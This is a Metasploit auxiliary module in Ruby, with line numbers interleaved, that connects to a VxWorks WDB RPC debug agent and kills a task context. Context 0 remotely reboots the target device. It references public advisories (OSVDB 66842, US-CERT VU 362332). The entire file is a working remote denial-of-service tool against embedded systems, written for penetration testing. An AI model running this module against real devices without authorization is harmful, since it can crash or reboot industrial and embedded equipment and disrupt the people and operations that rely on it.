1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::WDBRPC_Client
8
  include Msf::Auxiliary::Report
9
  include Msf::Auxiliary::Scanner
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'VxWorks WDB Agent Remote Reboot',
16
        'Description' => %q{
17
          This module provides the ability to reboot a VxWorks target through WDBRPC.
18
        },
19
        'Author' => [ 'hdm'],
20
        'License' => MSF_LICENSE,
21
        'References' => [
22
          ['OSVDB', '66842'],
23
          ['URL', 'http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/'],
24
          ['US-CERT-VU', '362332']
25
        ],
26
        'Actions' => [
27
          ['Reboot', { 'Description' => 'Reboot target' }]
28
        ],
29
        'DefaultAction' => 'Reboot',
30
        'Notes' => {
31
          'Stability' => [CRASH_OS_RESTARTS],
32
          'SideEffects' => [],
33
          'Reliability' => []
34
        }
35
      )
36
    )
37

38
    register_options(
39
      [
40
        OptInt.new('CONTEXT', [ true, 'The context to terminate (0=system reboot)', 0 ])
41
      ]
42
    )
43
  end
44

45
  def run_host(ip)
46
    wdbrpc_client_connect
47

48
    @wdbrpc_info[:rt_membase]
49
    @wdbrpc_info[:rt_memsize]
50
    @wdbrpc_info[:agent_mtu]
51
    ctx = datastore['CONTEXT'].to_i
52

53
    print_status("#{ip} - Killing task context #{ctx}...")
54

55
    wdbrpc_client_context_kill((ctx != 0) ? 3 : 0, ctx)
56

57
    print_status("#{ip} - Done")
58

59
    wdbrpc_client_disconnect
60
  end
61
end
62

63